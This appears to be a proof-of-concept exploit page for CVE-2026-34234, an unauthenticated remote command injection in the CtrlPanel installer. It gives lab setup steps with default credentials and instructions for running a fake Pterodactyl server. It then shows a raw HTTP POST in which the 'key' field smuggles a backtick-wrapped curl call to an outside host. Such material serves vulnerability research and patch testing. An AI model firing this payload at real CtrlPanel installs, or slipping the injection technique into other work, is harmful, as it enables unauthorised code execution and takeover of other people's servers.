Share
## https://sploitus.com/exploit?id=317C5B4A-42D4-5260-A33C-516AC3E15A51
-----
# Summary
- This is a POC for CVE-2026-34234 ([https://cvefeed.io/vuln/detail/CVE-2026-34234](https://cvefeed.io/vuln/detail/CVE-2026-34234)).
    - Application: [CtrlPanel](https://github.com/Ctrlpanel-gg/panel)
    - Vulnerability: Unauthenticated RCE using installer script
- A Dockerfile that spawns a vulnerable server can be found in `/ctrlPanel`
    - `echo '127.0.0.1 ctrl pter' >> /etc/hosts`
    - `docker run -p8088:80 -it --rm --name this this`
    - Pterodactyl Server Creds
        - username: admin
        - password: Password1
    - ctrlPanel Server creds
        - username: admin
        - password: password
- `exploit.py` will run a 'fake Pterodactyl server' and send the POST request to trigger the Command Injection.
------
# Manual Exploitation
### Fake Pterodactyl server
- Host a server that returns `{}` on routes:
    - /api/application/users
    - /api/client/account

### Command Injection POST
- send a POST request with fields:
    - url: is the url the server started in the **Prerequisites** section.
    - key: COMMAND INJECTION
        ```
        '``'
        ```
    - clientKey: anything
    - checkPtero
```http
POST /installer/index.php HTTP/1.1
Host: ctrl
Content-Length: 524
Content-Type: application/x-www-form-urlencoded

url=http://fakePtero&key=meow'`curl http://someHost.meow`'&clientkey=1&checkPtero=1
```